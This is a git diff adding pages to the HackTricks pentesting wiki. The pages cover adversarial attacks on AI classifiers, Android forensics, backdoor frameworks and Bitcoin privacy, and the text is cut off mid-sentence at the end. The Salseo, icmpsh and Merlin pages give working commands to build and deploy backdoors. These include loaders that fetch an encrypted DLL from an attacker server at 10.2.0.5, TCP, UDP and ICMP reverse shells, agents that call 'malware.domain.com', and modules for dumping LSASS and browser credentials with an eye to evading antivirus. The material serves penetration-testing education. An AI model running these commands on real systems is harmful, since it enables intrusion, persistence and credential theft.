a/a.i.-exploiting/bra.i.nsmasher-presentation/basic-captcha-breaker.md b/a.i.-exploiting/bra.i.nsmasher-presentation/basic-captcha-breaker.md new file mode 100644 index 00000000000..dcb34ebd55b --- /dev/null +++ b/a.i.-exploiting/bra.i.nsmasher-presentation/basic-captcha-breaker.md @@ -0,0 +1,7 @@ +# Basic Captcha Breaker + +In this tutorial **a basic captcha is going to be broken**. +A **NN is going to be trained** using several **images** that represents **letters** and then this NN is going to be used to **automatically identify the letters inside a captcha image**. + +Check the awesome guided tutorial provided by [**BrA.In Smasher**](https://beta.brainsmasher.eu/) in this [**google collab page**](https://colab.research.google.com/drive/1uiQJpqEj5V2_ijoumSd2noaDJuniTlKq?usp=sharing). + diff --git a/a.i.-exploiting/bra.i.nsmasher-presentation/bim-bruteforcer.md b/a.i.-exploiting/bra.i.nsmasher-presentation/bim-bruteforcer.md new file mode 100644 index 00000000000..2fdaee8df57 --- /dev/null +++ b/a.i.-exploiting/bra.i.nsmasher-presentation/bim-bruteforcer.md @@ -0,0 +1,16 @@ +# BIM Bruteforcer + +## BRUTEFORCER CORE SCRIPT WITH BIM ATTACK + +This time we introduce a new type of gradient based attack, in order to brute force an image classification app \(can be shaped and used for any input of course\), the BIM, or Basic Iteration Method. + +It’s recommended to see at least the explanation in the [**introduction challenge colab Notebook**](https://colab.research.google.com/drive/1lDh0oZ3TR-z87WjogdegZCdtsUuDADcR)\*\*\*\* + +To go deeper on the BIM topic:[ https://arxiv.org/pdf/1607.02533.pdf](https://arxiv.org/pdf/1607.02533.pdf) + +As usual we will provide only the A.I. attack core part, it’s up to you to complete the tool and blending it with PT techniques, depending on the situations. + +{% hint style="info" %} +Remember, in those kind of scenarios, in order to mime real-based attack applications, we don’t have the exact model to fool or the image target in which we would like to transform our image. That’s why, in order to overcome this issue, we must blend our core script, with a bruteforcer logic, accordingly to the application responses we want to fool. +{% endhint %} + diff --git a/a.i.-exploiting/bra.i.nsmasher-presentation/hybrid-malware-classifier-part-1.md b/a.i.-exploiting/bra.i.nsmasher-presentation/hybrid-malware-classifier-part-1.md new file mode 100644 index 00000000000..1228526893c --- /dev/null +++ b/a.i.-exploiting/bra.i.nsmasher-presentation/hybrid-malware-classifier-part-1.md @@ -0,0 +1,22 @@ +# Hybrid Malware Classifier Part 1 + +## A.I. HYBRID MALWARE CLASSIFIER + +### INTERMEDIATE PYTHON SKILL, INTERMEDIATE MACHINE LEARNING SKILLS \(Part 1\) + +In this series of notebook we are going to build an **hybrid malware classifier.** + +For the **First part** we will focus on the scripting that involves dynamic analysis. Any steps of this series will come useful in order to detect malwares, and in this piece we will try to classify them based on their behaviour, utilizing the logs produced by running a program. + +In the **Second Part** we will see how to manipulate the logs files in order to add robustness to our classifier and adjust the code to counter the more advanced methods of A.I. Malware Evasion. + +In the **Third Part** we will create a Static Malware Classifier. + +For the **Fourth Part** For the Fourth Part we will add some tactics to add robustness to our Static classifier and merge the latter with our Dynamic Classifier. + +**PLEASE NOTE:** This Series strongly relies on building a dataset on your own, even if it’s not mandatory. + +There are also many available datasets for Static and/ or Dynamic Malware analysis on several sites for this type of classification, like Ember, VirusShare, Sorel-20M, but i strongly encourage that you build one or your own. + +Here’s the link to our [**colab notebook**](https://colab.research.google.com/drive/1nNZLMogXF-iq-_78IvGTd-c89_C82AB8#scrollTo=lUHLMl8Pusrn) enjoy and stay safe :\) + diff --git a/about-the-author.md b/about-the-author.md new file mode 100644 index 00000000000..0ad8f853abe --- /dev/null +++ b/about-the-author.md @@ -0,0 +1,31 @@ +# About the author + +### Hello!! + +This is **Carlos Polop**. + +First of all, I want to indicate that **I don't own this entire book**, a lot of **information was copy/pasted from other websites and that content belongs to them** \(this is indicated on the pages\). + +I also wants to say **thanks to all the people that share cyber-security related information for free** on the Internet. Thanks to them I learn new hacking techniques that then I add to Hacktricks. + +### BIO + +If for some weird reason you are interested in knowing about my bio here you have a summary: + +* I've worked in different companies as sysadmin, developer and **pentester**. +* I'm a **Telecommunications Engineer** with a **Masters** in **Cybersecurity** +* Relevant certifications: **OSCP, OSWE**, **CRTP, eMAPT, eWPTXv2** and Professional Drone pilot. +* I speak **Spanish** and **English** and little of French \(some day I will improve that\). +* I'm a **CTF player** +* I'm very proud of this **book** and my **PEASS** \(I'm talking about these peass: [https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite)\) +* And I really enjoy researching, playing CTFs, pentesting and everything related to **hacking**. + +### Support HackTricks + +Thank you for be **reading this**! + +Do you use **Hacktricks every day**? Did you find the book **very** **useful**? Would you like to **receive extra help** with cybersecurity questions? Would you like to **find more and higher quality content on Hacktricks**? [**Support Hacktricks through github sponsors**](https://github.com/sponsors/carlospolop) **so we can dedicate more time to it and also get access to the Hacktricks private group where you will get the help you need and much more!** + +If you want to know about my **latest modifications**/**additions** or you have **any suggestion for HackTricks** or **PEASS**, **join the** [**💬**](https://emojipedia.org/speech-balloon/)[**telegram group**](https://t.me/peass), or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) that will be reflected in this book and don't forget to **give ⭐** on **github** to **motivate** **me** to continue developing this book. + diff --git a/android-forensics.md b/android-forensics.md new file mode 100644 index 00000000000..fe4bf492c3c --- /dev/null +++ b/android-forensics.md @@ -0,0 +1,24 @@ +# Android Forensics + +## Locked Device + +To start extracting data from an Android device it has to be unlocked. If it's locked you can: + +* Check if the device has debugging via USB activated. +* Check for a possible [smudge attack](https://www.usenix.org/legacy/event/woot10/tech/full_papers/Aviv.pdf) +* Try with [Brute-force](https://www.cultofmac.com/316532/this-brute-force-device-can-crack-any-iphones-pin-code/) + +## Data Adquisition + +Create an [android backup using adb](mobile-apps-pentesting/android-app-pentesting/adb-commands.md#backup) and extract it using [Android Backup Extractor](https://sourceforge.net/projects/adbextractor/): `java -jar abe.jar unpack file.backup file.tar` + +### If root access or physical connection to JTAG interface + +* `cat /proc/partitions` \(search the path to the flash memory, generally the first entry is _mmcblk0_ and corresponds to the whole flash memory\). +* `df /data` \(Discover the block size of the system\). +* dd if=/dev/block/mmcblk0 of=/sdcard/blk0.img bs=4096 \(execute it with the information gathered from the block size\). + +### Memory + +Use Linux Memory Extractor \(LiME\) to extract the RAM information. It's a kernel extension that should be loaded via adb. + diff --git a/backdoors/empire.md b/backdoors/empire.md new file mode 100644 index 00000000000..cf0d31ceaee --- /dev/null +++ b/backdoors/empire.md @@ -0,0 +1,6 @@ +--- +description: 'https://github.com/EmpireProject/Empire' +--- + +# Empire + diff --git a/backdoors/icmpsh.md b/backdoors/icmpsh.md new file mode 100644 index 00000000000..b9b44431b74 --- /dev/null +++ b/backdoors/icmpsh.md @@ -0,0 +1,34 @@ +--- +description: 'https://github.com/inquisb/icmpsh' +--- + +# ICMPsh + +Download the backdoor from: [https://github.com/inquisb/icmpsh](https://github.com/inquisb/icmpsh) + +## Client side + +Execute the script: **run.sh** + +**If you get some error, try to change the lines:** + +```bash +IPINT=$(ifconfig | grep "eth" | cut -d " " -f 1 | head -1) +IP=$(ifconfig "$IPINT" |grep "inet addr:" |cut -d ":" -f 2 |awk '{ print $1 }') +``` + +**For:** + +```bash +echo Please insert the IP where you want to listen +read IP +``` + +## **Victim Side** + +Upload **icmpsh.exe** to the victim and execute: + +```bash +icmpsh.exe -t -d 500 -b 30 -s 128 +``` + diff --git a/backdoors/merlin.md b/backdoors/merlin.md new file mode 100644 index 00000000000..4faa9e8895f --- /dev/null +++ b/backdoors/merlin.md @@ -0,0 +1,95 @@ +--- +description: 'https://github.com/Ne0nd0g/merlin' +--- + +# Merlin + +## Installation + +### Install GO + +```text +#Download GO package from: https://golang.org/dl/ +#Decompress the packe using: +tar -C /usr/local -xzf go$VERSION.$OS-$ARCH.tar.gz + +#Change /etc/profile +Add ":/usr/local/go/bin" to PATH +Add "export GOPATH=$HOME/go" +Add "export GOBIN=$GOPATH/bin" + +source /etc/profile +``` + +### Install Merlin + +```text +go get https://github.com/Ne0nd0g/merlin/tree/dev #It is recommended to use the developer branch +cd $GOPATH/src/github.com/Ne0nd0g/merlin/ +``` + +## Launch Merlin Server + +```text +go run cmd/merlinserver/main.go -i +``` + +## Merlin Agents + +You can [download precompiled agents](https://github.com/Ne0nd0g/merlin/releases) + +### Compile Agents + +Go to the main folder _$GOPATH/src/github.com/Ne0nd0g/merlin/_ + +```text +#User URL param to set the listener URL +make #Server and Agents of all +make windows #Server and Agents for Windows +make windows-agent URL=https://malware.domain.com:443/ #Agent for windows (arm, dll, linux, darwin, javascript, mips) +``` + +### **Manual compile agents** + +```text +GOOS=windows GOARCH=amd64 go build -ldflags "-X main.url=https://10.2.0.5:443" -o agent.exe main.g +``` + +## Modules + +**The bad news is that every module used by Merlin is downloaded from the source \(github\) and saved indisk before using it. Forge about usingwell known modules because Windows Defender will catch you!** + + +**SafetyKatz** --> Modified Mimikatz. Dump LSASS to file and launch:sekurlsa::logonpasswords to that file +**SharpDump** --> minidump for the process ID specified \(LSASS by default\) \(Itsais that the extension of the final file is .gz but indeed it is.bin, but is agz file\) +**SharpRoast** -->Kerberoast \(doesn't work\) +**SeatBelt** --> Local Security Tests in CS \(does not work\) https://github.com/GhostPack/Seatbelt/blob/master/Seatbelt/Program.cs +**Compiler-CSharp** --> Compile using csc.exe /unsafe +**Sharp-Up** -->Allchecks in C\# in powerup \(works\) +**Inveigh** --> PowerShellADIDNS/LLMNR/mDNS/NBNS spoofer and man-in-the-middle tool \(doesn't works, need to load: https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Inveigh.ps1\) +**Invoke-InternalMonologue** --> impersonates all available users and retrieves a challenge-response for each \(NTLM hash for each user\) \(bad url\) +**Invoke-PowerThIEf** --> Steal forms from IExplorer or make it execute JS or inject a DLL in that process \(doesnt work\) \(and the PS looks like doesnt work either\) https://github.com/nettitude/Invoke-PowerThIEf/blob/master/Invoke-PowerThIEf.ps1 +**LaZagneForensic** --> Get browser passwords \(works but dont prints the output directory\) +**dumpCredStore** --> Win32 Credential Manager API \(https://github.com/zetlen/clortho/blob/master/CredMan.ps1\) https://www.digitalcitizen.life/credential-manager-where-windows-stores-passwords-other-login-details +**Get-InjectedThread** --> Detect classic injection in running processes \(Classic Injection \(OpenProcess, VirtualAllocEx, WriteProcessMemory, CreateRemoteThread\)\) \(doesnt works\) +**Get-OSTokenInformation** --> Get Token Info of the running processes and threads \(User, groups, privileges, owner… https://docs.microsoft.com/es-es/windows/desktop/api/winnt/ne-winnt-\_token\_information\_class\) +**Invoke-DCOM** --> Execute a command \(inother computer\) via DCOM \(http://www.enigma0x3.net.\) \(https://enigma0x3.net/2017/09/11/lateral-movement-using-excel-application-and-dcom/\) +**Invoke-DCOMPowerPointPivot** --> Execute a command in othe PC abusing PowerPoint COM objects \(ADDin\) +**Invoke-ExcelMacroPivot** --> Execute a command in othe PC abusing DCOM in Excel +**Find-ComputersWithRemoteAccessPolicies** --> \(not working\) \(https://labs.mwrinfosecurity.com/blog/enumerating-remote-access-policies-through-gpo/\) +**Grouper** --> It dumps all the most interesting parts of group policy and then roots around in them for exploitable stuff. \(deprecated\) Take a look at Grouper2, looks really nice +**Invoke-WMILM** --> WMI to move laterally +**Get-GPPPassword** --> Look for groups.xml, scheduledtasks.xml, services.xmland datasources.xml and returns plaintext passwords \(insidedomain\) +**Invoke-Mimikatz** --> Use mimikatz \(default dump creds\) +**PowerUp** --> https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc +**Find-BadPrivilege** --> Check the privileges of users in computers +**Find-PotentiallyCrackableAccounts** --> retrieve information about user accounts associated with SPN \(Kerberoasting\) +**psgetsystem** --> getsystem + +**Didn't check persistence modules** + +## Resume + +I really like the feeling and the potential of the tool. +I hope the tool will start downloading the modules from the server and integrates some kind of evasion when downloading scripts. + diff --git a/backdoors/salseo.md b/backdoors/salseo.md new file mode 100644 index 00000000000..9978025e6fc --- /dev/null +++ b/backdoors/salseo.md @@ -0,0 +1,179 @@ +--- +description: 'https://github.com/Hackplayers/Salsa-tools' +--- + +# Salseo + +## Compiling the binaries + +Download the source code from the github and compile **EvilSalsa** and **SalseoLoader**. You will need **Visual Studio** installed to compile the code. + +Compile those projects for the architecture of the windows box where your are going to use them\(If the Windows supports x64 compile them for that architectures\). + +You can **select the architecture** inside Visual Studio in the **left "Build" Tab** in **"Platform Target".** + +**\(**If you can't find this options press in **"Project Tab"** and then in **"<Project Name> Properties"**\) + +![](../.gitbook/assets/image%20%28154%29.png) + +Then, build both projects \(Build -> Build Solution\) \(Inside the logs will appear the path of the executable\): + +![](../.gitbook/assets/image%20%28233%29.png) + +## Prepare the Backdoor + +First of all, you will need to encode the **EvilSalsa.dll.** To do so, you can use the python script **encrypterassembly.py** or you can compile the project **EncrypterAssembly** + +### **Python** + +```text +python EncrypterAssembly/encrypterassembly.py +python EncrypterAssembly/encrypterassembly.py EvilSalsax.dll password evilsalsa.dll.txt +``` + +### Windows + +```text +EncrypterAssembly.exe +EncrypterAssembly.exe EvilSalsax.dll password evilsalsa.dll.txt +``` + +Ok, now you have everything you need to execute all the Salseo thing: the **encoded EvilDalsa.dll** and the **binary of SalseoLoader.** + +**Upload the SalseoLoader.exe binary to the machine. They shouldn't be detected by any AV...** + +## **Execute the backdoor** + +### **Getting a TCP reverse shell \(downloading encoded dll through HTTP\)** + +Remember to start a nc as the reverse shell listener, and a HTTP server to serve the encoded evilsalsa. + +```text +SalseoLoader.exe password http:///evilsalsa.dll.txt reversetcp +``` + +### **Getting a UDP reverse shell \(downloading encoded dll through SMB\)** + +Remember to start a nc as the reverse shell listener, and a SMB server to serve the encoded evilsalsa \(impacket-smbserver\). + +```text +SalseoLoader.exe password \\/folder/evilsalsa.dll.txt reverseudp +``` + +### **Getting a ICMP reverse shell \(encoded dll already inside the victim\)** + +**This time you need a special tool in the client to receive the reverse shell. Download:** [**https://github.com/inquisb/icmpsh**](https://github.com/inquisb/icmpsh)\*\*\*\* + +#### **Disable ICMP Replies:** + +```text +sysctl -w net.ipv4.icmp_echo_ignore_all=1 + +#You finish, you can enable it again running: +sysctl -w net.ipv4.icmp_echo_ignore_all=0 +``` + +#### Execute the client: + +```text +python icmpsh_m.py "" "" +``` + +#### Inside the victim, lets execute the salseo thing: + +```text +SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp +``` + +## Compiling SalseoLoader as DLL exporting main function + +Open the SalseoLoader project using Visual Studio. + +### Add before the main function: \[DllExport\] + +![](../.gitbook/assets/image%20%2888%29.png) + +### Install DllExport for this project + +#### **Tools** --> **NuGet Package Manager** --> **Manage NuGet Packages for Solution...** + +![](../.gitbook/assets/image%20%2855%29.png) + +#### **Search for DllExport package \(using Browse tab\), and press Install \(and accept the popup\)** + +![](../.gitbook/assets/image%20%28240%29.png) + +In your project folder have appeared the files: **DllExport.bat** and **DllExport\_Configure.bat** + +### **U**ninstall DllExport + +Press **Uninstall** \(yeah, its weird but trust me, it is necessary\) + +![](../.gitbook/assets/image%20%28104%29.png) + +### **Exit Visual Studio and execute DllExport\_configure** + +Just **exit** Visual Studio + +Then, go to your **SalseoLoader folder** and **execute DllExport\_Configure.bat** + +Select **x64** \(if you are going to use it inside a x64 box, that was my case\), select **System.Runtime.InteropServices** \(inside **Namespace for DllExport**\) and press **Apply** + +![](../.gitbook/assets/image%20%28236%29.png) + +### **Open the project again with visual Studio** + +**\[DllExport\]** should not be longer marked as error + +![](../.gitbook/assets/image%20%28249%29.png) + +### Build the solution + +Select **Output Type = Class Library** \(Project --> SalseoLoader Properties --> Application --> Output type = Class Library\) + +![](../.gitbook/assets/image%20%28226%29.png) + +Select **x64** **platform** \(Project --> SalseoLoader Properties --> Build --> Platform target = x64\) + +![](../.gitbook/assets/image%20%28137%29.png) + +To **build** the solution: Build --> Build Solution \(Inside the Output console the path of the new DLL will appear\) + +### Test the generated Dll + +Copy and paste the Dll where you want to test it. + +Execute: + +```text +rundll32.exe SalseoLoader.dll,main +``` + +If not error appears, probably you have a functional dll!! + +## Get a shell using the Dll + +Don't forget to use a **HTTP** **server** and set a **nc** **listener** + +### Powershell + +```text +$env:pass="password" +$env:payload="http://10.2.0.5/evilsalsax64.dll.txt" +$env:lhost="10.2.0.5" +$env:lport="1337" +$env:shell="reversetcp" +rundll32.exe SalseoLoader.dll,main +``` + +### CMD + +```text +set pass=password +set payload=http://10.2.0.5/evilsalsax64.dll.txt +set lhost=10.2.0.5 +set lport=1337 +set shell=reversetcp +rundll32.exe SalseoLoader.dll,main +``` + diff --git a/blockchain/blockchain-and-crypto-currencies.md b/blockchain/blockchain-and-crypto-currencies.md new file mode 100644 index 00000000000..e6e9d85afc8 --- /dev/null +++ b/blockchain/blockchain-and-crypto-currencies.md @@ -0,0 +1,283 @@ +# Blockchain & Crypto Currencies + +## Basic Terminology + +* **Smart contract**: Smart contracts are simply **programs stored on a blockchain that run when predetermined conditions are met**. They typically are used to automate the **execution** of an **agreement** so that all participants can be immediately certain of the outcome, without any intermediary’s involvement or time loss. \(From [here](https://www.ibm.com/topics/smart-contracts)\). + * Basically, a smart contract is a **piece of code** that is going to be executed when people access and accept the contract. Smart contracts **run in blockchains** \(so the results are stored inmutable\) and can be read by the people before accepting them. +* **dApps**: **Decentralised applications** are implemented on top of **smart** **contracts**. They usually have a front-end where the user can interact with the app, the **back-end** is public \(so it can be audited\) and is implemented as a **smart contract**. Sometimes the use of a database is needed, Ethereum blockchain allocates certain storage to each account. +* **Tokens & coins**: A **coin** is a cryptocurrency that act as **digital** **money** and a **token** is something that **represents** some **value** but it's not a coin. + * **Utility Tokens**: These tokens allow the user to **access certain service later** \(it's something that have some value in a specific environment\). + * **Security Tokens**: These represents the **ownership** or some asset. +* **DeFi**: **Decentralized Finance**. +* **DEX: Decentralized Exchange Platforms**. +* **DAOs**: **Decentralized Autonomous Organizations**. + +## Consensus Mechanisms + +For a blockchain transaction to be recognized, it must be **appended** to the **blockchain**. Validators \(miners\) carry out this appending; in most protocols, they **receive a reward** for doing so. For the blockchain to remain secure, it must have a mechanism to **prevent a malicious user or group from taking over a majority of validation**. + +Proof of work, another commonly used consensus mechanism, uses a validation of computational prowess to verify transactions, requiring a potential attacker to acquire a large fraction of the computational power of the validator network. + +### Proof Of Work \(PoW\) + +This uses a **validation of computational prowess** to verify transactions, requiring a potential attacker to acquire a large fraction of the computational power of the validator network. +The **miners** will **select several transactions** and then start **computing the Proof Of Work**. The **miner with the greatest computation resources** is more probably to **finish** **earlier** the Proof of Work and get the fees of all the transactions. + +### Proof Of Stake \(PoS\) + +PoS accomplishes this by **requiring that validators have some quantity of blockchain tokens**, requiring **potential attackers to acquire a large fraction of the tokens** on the blockchain to mount an attack. +In this kind of consensus, the more tokens a miner has, the more probably it will be that the miner will be asked to create the next block. +Compared with PoW, this greatly **reduced the energy consumption** the miners are expending. + +## Bitcoin + +### Transactions + +A simple **transaction** is a **movement of money** from an address to another one. +An **address** in bitcoin is the hash of the **public** **key**, therefore, someone in order to make a transaction from an address he needs to know the private key associated to that public key \(the address\). +Then, when a **transaction** is performed, it's **signed** with the private key of the address to show that the transaction is **legit**. + +The first part of producing a digital signature in Bitcoin can be represented mathematically in the following way: +_**Sig**_ = _**Fsig**_\(_**Fhash**_\(_**m**_\),_**dA**_\) + +Where: + +* _d_A is the signing **private key** +* _m_ is the **transaction** +* Fhash is the hashing function +* Fsig is the signing algorithm +* Sig is the resulting signature + +The signing function \(Fsig\) produces a signature \(Sig\) that comprises of two values: R and S: + +* Sig = \(R, S\) + +Once R and S have been calculated, they are serialized into a byte stream that is encoded using an international standard encoding scheme that is known as the Distinguished Encoding Rules \(or DER\). In order to verify that the signature is valid, a signature verification algorithm is used. Verification of a digital signature requires the following: + +* Signature \(R and S\) +* Transaction hash +* The public key that corresponds to the private key that was used to create the signature + +Verification of a signature effectively means that only the owner of the private key \(that generated the public key\) could have produced the signature on the transaction. The signature verification algorithm will return ‘TRUE’ if the signature is indeed valid. + +#### Multisignature Transactions + +A multi-signature **address** is an address that is associated with more than one ECDSA private key. The simplest type is an m-of-n address - it is associated with n private keys, and sending bitcoins from this address requires signatures from at least m keys. A multi-signature **transaction** is one that sends funds from a multi-signature address. + +#### Transactions Fields + +Each bitcoin transaction has several fields: + +* **Inputs**: The amount and address **from** where **bitcoins** are **being** transferred +* **Outputs**: The address and amounts that each **transferred** to **each** **output** +* **Fee:** The amount of **money** that is **payed** to the **miner** of the transaction +* **Script\_sig**: Script signature of the transaction +* **Script\_type**: Type of transaction + +There are **2 main types** of transactions: + +* **P2PKH: "Pay To Public Key Hash"**: This is how transactions are made. You are requiring the **sender** to supply a valid **signature** \(from the private key\) and **public** **key**. The transaction output script will use the signature and public key and through some cryptographic functions will check **if it matches** with the public key hash, if it does, then the **funds** will be **spendable**. This method conceals your public key in the form of a hash for extra security. +* **P2SH: "Pay To Script Hash":** The outputs of a transaction are just **scripts** \(this means the person how want this money send a script\) that, if are **executed with specific parameters, will result in a boolean of `true` or `false`**. If a miner runs the output script with the supplied parameters and results in `true`, the **money will be sent to your desired output**. `P2SH` is used for **multi-signature** wallets making the output scripts **logic that checks for multiple signatures before accepting the transaction**. `P2SH` can also be used to allow anyone, or no one, to spend the funds. If the output script of a P2SH transaction is just `1` for true, then attempting to spend the output without supplying parameters will just result in `1` making the money spendable by anyone who tries. This also applies to scripts that return `0`, making the output spendable by no one. + +### Lightning Network + +This protocol helps to **perform several transactions to a channe**l and **just** **sent** the **final** **state** to the blockchain to save it. +This **improves** bitcoin blockchain **speed** \(it just on allow 7 payments per second\) and it allows to create **transactions more difficult to trace** as the channel is created via nodes of the bitcoin blockchain: + +![](../.gitbook/assets/image%20%28611%29.png) + +Normal use of the Lightning Network consists of **opening a payment channel** by committing a funding transaction to the relevant base blockchain \(layer 1\), followed by making **any number** of Lightning Network **transactions** that update the tentative distribution of the channel's funds **without broadcasting those to the blockchain**, optionally followed by closing the payment channel by **broadcasting** the **final** **version** of the settlement transaction to distribute the channel's funds. + +Note that any of the both members of the channel can stop and send the final state of the channel to the blockchain at any time. + +## Bitcoin Privacy Attacks + +### Common Input + +Theoretically the inputs of one transaction can belong to different users, but in reality that is unusual as it requires extra steps. Therefore, very often it can be assumed that **2 input addresses in the same transaction belongs to the same owner**. + +### UTXO Change Address Detection + +**UTXO** means **Unspent Transaction Outputs** \(UTXOs\). In a transaction that uses the output from a previous transaction as an input, the **whole output need to be spent** \(to avoid double-spend attacks\). Therefore, if the intention was to **send** just **part** of the money from that output to an address and **keep** the **other** **part**, **2 different outputs** will appear: the **intended** one and a **random new change address** where the rest of the money will be saved. + +Then, a watcher can make the assumption that **the new change address generated belong to the owner of the UTXO**. + +### Social Networks & Forums + +Some people gives data about theirs bitcoin addresses in different webs on Internet. **This make pretty easy to identify the owner of an address**. + +### Transaction Graphs + +By representing the transactions in graphs, i**t's possible to know with certain probability to where the money of an account were**. Therefore, it's possible to know something about **users** that are **related** in the blockchain. + +### **Unnecessary input heuristic** + +Also called the "optimal change heuristic". Consider this bitcoin transaction. It has two inputs worth 2 BTC and 3 BTC and two outputs worth 4 BTC and 1 BTC. + +```text +2 btc --> 4 btc +3 btc 1 btc +``` + +Assuming one of the outputs is change and the other output is the payment. There are two interpretations: the payment output is either the 4 BTC output or the 1 BTC output. But if the 1 BTC output is the payment amount then the 3 BTC input is unnecessary, as the wallet could have spent only the 2 BTC input and paid lower miner fees for doing so. This is an indication that the real payment output is 4 BTC and that 1 BTC is the change output. + +This is an issue for transactions which have more than one input. One way to fix this leak is to add more inputs until the change output is higher than any input, for example: + +```text +2 btc --> 4 btc +3 btc 6 btc +5 btc +``` + +### Forced address reuse + +**Forced address reuse** or **incentivized address reuse** is when an adversary pays an \(often small\) amount of bitcoin to addresses that have already been used on the block chain. The adversary hopes that users or their wallet software **will use the payments as inputs to a larger transaction which will reveal other addresses via the the common-input-ownership** heuristic. These payments can be understood as a way to coerce the address owner into unintentional address reuse. + +This attack is sometimes incorrectly called a **dust attack**. + +The correct behaviour by wallets is to not spend coins that have landed on an already-used empty addresses. + +### Other Blockchain Analysis + +* **Exact Payment Amounts**: In order to avoid transactions with a change, the payment needs to be equal to the UTXO \(which is highly unexpected\). Therefore, a **transaction with no change address are probably transfer between 2 addresses of the same user**. +* **Round Numbers**: In a transaction, if one of the outputs is a "**round number**", it's highly probable that this is a **payment to a human that put that** "round number" **price**, so the other part must be the leftover. +* **Wallet fingerprinting:** A careful analyst sometimes deduce which software created a certain transaction, because the many **different wallet softwares don't always create transactions in exactly the same way**. Wallet fingerprinting can be used to detect change outputs because a change output is the one spent with the same wallet fingerprint. +* **Amount & Timing correlations**: If the person that performed the transaction **discloses** the **time** and/or **amount** of the transaction, it can be easily **discoverable**. + +### Traffic analysis + +Some organisation **sniffing your traffic** can see you communicating in the bitcoin network. +If the adversary sees a transaction or block **coming out of your node which did not previously enter**, then it can know with near-certainty that **the transaction was made by you or the block was mined by you**. As internet connections are involved, the adversary will be able to **link the IP address with the discovered bitcoin information**. + +An attacker that isn't able to sniff all the Internet traffic but that has **a lot of Bitcoin nodes** in order to stay **closer** to the s**o**urces could be able to know the IP address that are announcing transactions or blocks. +Also, some wallets periodically rebroadcast their unconfirmed transactions so that they are more likely to propagate widely through the network and be mined. + +### Other attacks to find info about the owner of addresses + +For more attacks read [https://en.bitcoin.it/wiki/Privacy](https://en.bitcoin.it/wiki/Privacy) + +## Anonymous Bitcoins + +### Obtaining Bitcoins Anonymously + +* **Cash trades:** Buy bitcoin using cash. +* **Cash substitute:** Buy gift cards or similar and exchange them for bitcoin online. +* **Mining:** Mining is the most anonymous way to obtain bitcoin. This applies to solo-mining as [mining pools](https://en.bitcoin.it/wiki/Pooled_mining) generally know the hasher's IP address. +* **Stealing:** In theory another way of obtaining anonymous bitcoin is to steal them. + +### Mixers + +A user would **send bitcoins to a mixing service** and the service would **send different bitcoins back to the user**, minus a fee. In theory an adversary observing the blockchain would be **unable to link** the incoming and outgoing transactions. + +However, the user needs to trust the mixing service to return the bitcoin and also to not be saving logs about the relations between the money received and sent. +Some other services can be also used as mixers, like Bitcoin casinos where you can send bitcoins and retrieve them later. + +### CoinJoin + +**CoinJoin** will **mix several transactions of different users into just one** in order to make more **difficult** for an observer to find out **which input is related to which output**. +This offers a new level of privacy, however, **some** **transactions** where some input and output amounts are correlated or are very different from the rest of the inputs and outputs **can still be correlated** by the external observer. + +Examples of \(likely\) CoinJoin transactions IDs on bitcoin's blockchain are `402d3e1df685d1fdf82f36b220079c1bf44db227df2d676625ebcbee3f6cb22a` and `85378815f6ee170aa8c26694ee2df42b99cff7fa9357f073c1192fff1f540238`. + +[**https://coinjoin.io/en**](https://coinjoin.io/en) +**Similar to coinjoin but better and for ethereum you have** [**Tornado Cash**](https://tornado.cash/) **\(the money is given from miners, so it jus appear in your waller\).** + +### PayJoin + +The type of CoinJoin discussed in the previous section can be easily identified as such by checking for the multiple outputs with the same value. + +PayJoin \(also called pay-to-end-point or P2EP\) is a special type of CoinJoin between two parties where one party pays the other. The transaction then **doesn't have the distinctive multiple outputs** with the same value, and so is not obviously visible as an equal-output CoinJoin. Consider this transaction: + +```text +2 btc --> 3 btc +5 btc 4 btc +``` + +It could be interpreted as a simple transaction paying to somewhere with leftover change \(ignore for now the question of which output is payment and which is change\). Another way to interpret this transaction is that the 2 BTC input is owned by a merchant and 5 BTC is owned by their customer, and that this transaction involves the customer paying 1 BTC to the merchant. There is no way to tell which of these two interpretations is correct. The result is a coinjoin transaction that breaks the common-input-ownership heuristic and improves privacy, but is also **undetectable and indistinguishable from any regular bitcoin transaction**. + +If PayJoin transactions became even moderately used then it would make the **common-input-ownership heuristic be completely flawed in practice**. As they are undetectable we wouldn't even know whether they are being used today. As transaction surveillance companies mostly depend on that heuristic, as of 2019 there is great excitement about the PayJoin idea. + +## Bitcoin Privacy Good Practices + +### Wallet Synchronization + +Bitcoin wallets must somehow obtain information about their balance and history. As of late-2018 the most practical and private existing solutions are to use a **full node wallet** \(which is maximally private\) and **client-side block filtering** \(which is very good\). + +* **Full node:** Full nodes download the entire blockchain which contains every on-chain [transaction](https://en.bitcoin.it/wiki/Transaction) that has ever happened in bitcoin. So an adversary watching the user's internet connection will not be able to learn which transactions or addresses the user is interested in. +* **Client-side block filtering:** Client-side block filtering works by having **filters** created that contains all the **addresses** for every transaction in a block. The filters can test whether an **element is in the set**; false positives are possible but not false negatives. A lightweight wallet would **download** all the filters for every **block** in the **blockchain** and check for matches with its **own** **addresses**. Blocks which contain matches would be downloaded in full from the peer-to-peer network, and those blocks would be used to obtain the wallet's history and current balance. + +### Tor + +Bitcoin network uses a peer-to-peer network, which means that other peers can learn your IP address. This is why it's recommend to **connect through Tor every time you want to interact with the bitcoin network**. + +### Avoiding address reuse + +**Addresses being used more than once is very damaging to privacy because that links together more blockchain transactions with proof that they were created by the same entity**. The most private and secure way to use bitcoin is to send a brand **new address to each person who pays you**. After the received coins have been spent the address should never be used again. Also, a brand new bitcoin address should be demanded when sending bitcoin. All good bitcoin wallets have a user interface which discourages address reuse. + +### Multiple transactions + +**Paying** someone with **more than one on-chain transaction** can greatly reduce the power of amount-based privacy attacks such as amount correlation and round numbers. For example, if the user wants to pay 5 BTC to somebody and they don't want the 5 BTC value to be easily searched for, then they can send two transactions for the value of 2 BTC and 3 BTC which together add up to 5 BTC. + +### Change avoidance + +Change avoidance is where transaction inputs and outputs are carefully chosen to not require a change output at all. **Not having a change output is 